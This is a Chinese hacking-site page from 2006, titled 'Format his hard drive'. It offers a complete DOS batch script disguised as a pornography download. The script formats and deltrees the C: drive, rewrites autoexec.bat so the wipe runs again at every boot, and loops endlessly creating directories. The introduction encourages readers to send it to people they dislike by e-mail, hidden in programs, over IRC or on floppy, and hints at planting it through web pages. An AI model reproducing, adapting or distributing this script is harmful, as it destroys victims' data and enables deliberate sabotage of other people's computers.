学院首页>安全防御>黑客技法>格式化他的硬盘

格式化他的硬盘

作者:未知 来源:todb.yeah.net 添加时间:2006-5-21 17:01:38
 希望大家不要伤害无辜的人,但个别及其极端讨厌的人除外!可以用E-mail,藏在小程序内,irc中发给他,干脆直
接用软盘拷到他的电脑上去(这可是最好的方法,他或许认为是一个新的病毒).(coconut按:其实有一种方法可以在对方浏览html的时候自动给对方的机器加autoexec.bat,嘿嘿……怎么做?别问我~~~)把下面代码另存为一个.bat文件,接着就看你怎么用了,千万小心不要用自己作实验啊!!!!!!

-----------------------从这开始---------------------------------
@echo off
rem Bye Bye Hardrive 1.0
echo Please wait while program uploads some nice pronography....

call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo dummy variable >c:\dvar.txt

:form
call format c: /q /u /autotest >nul
if exist c:\dos\format.* goto dosform
if exist c:\windows\command\format.* goto winform
goto de

:dosform
cd\dos >nul
call format c: /h /q /u /autotest >nul
cd\ >nul

:winform
cd\windows\command >nul
call format c: /h /q /u /autotest >nul
cd\ >nul
goto inform

:de
if exist c:\dvar.txt goto dtree
goto inform

:dtree
call deltree /y c: >nul
if exist c:\dos\deltree.* goto deldos
if exist c:\windows\command\deltree.* goto delwin
goto inform

:deldos
cd\dos
call deltree /y c: >nul
cd
:delwin
cd\windows\command >nul
call deltree /y c: >nul
cd\ >nul

rem The following rewrites the code into the autoexec.bat file.

echo @echo off >c:\autoexec.bat
echo cls >>c:\autoexe.bat

echo :form
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo if exist c:\dos\format.* goto dosform >>c:\autoexec.bat
echo if exist c:\windows\command\format.* goto winform >>c:\autoexec.bat
echo goto de >>c:\autoexec.bat

echo :dosform >>c:\autoexec.bat
echo cd\dos >nul >>c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat

echo :winform >>c:\autoexec.bat
echo cd\windows\command >nul >>c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat
echo goto write >>c:\autoexec.bat

echo :de >>c:\autoexec.bat
echo if exist c:\dvar.txt goto dtree >>c:\autoexec.bat
echo goto write >>c:\autoexec.bat

echo :dtree >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo if exist c:\dos\deltree.* goto deldos >>c:\autoexec.bat
echo if exist c:\windows\command\deltree.* goto delwin >>c:\autoexec.bat

echo :deldos >>c:\autoexec.bat
echo cd\dos >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat

echo :delwin >>c:\autoexec.bat
echo cd\windows\command >nul >>c:\autoexec.bat
echo call deltree /y c: >nul >>c:\autoexec.bat
echo cd\ >nul >>c:\autoexec.bat

echo :write >>c:\autoexec.bat
echo type hdkiller.txt >>c:\autoexec.bat
echo c:\ >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo :nasty >>c:\autoexec.bat
echo md nasty >>c:\autoexec.bat
echo cd nasty >>c:\autoexec.bat
echo echo You're Gone @$$ hole!!!! >yourgone.txt >>c:\autoexec.bat
echo goto nasty >>c:\autoexec.bat
echo pause >>c:\autoexec.bat

rem Rewriting of code to the autoexec.bat file is complete.

c:\ >nul
cd\ >nul
:killfat
md nasty >nul
cd nasty >nul
echo Woops Is sent the hdk and not the pornography o well.. >yourgone.txt >nul
goto killfat

:end

上一篇:黑客是如何攻击Yahoo的
下一篇:没有下篇文章
站内搜索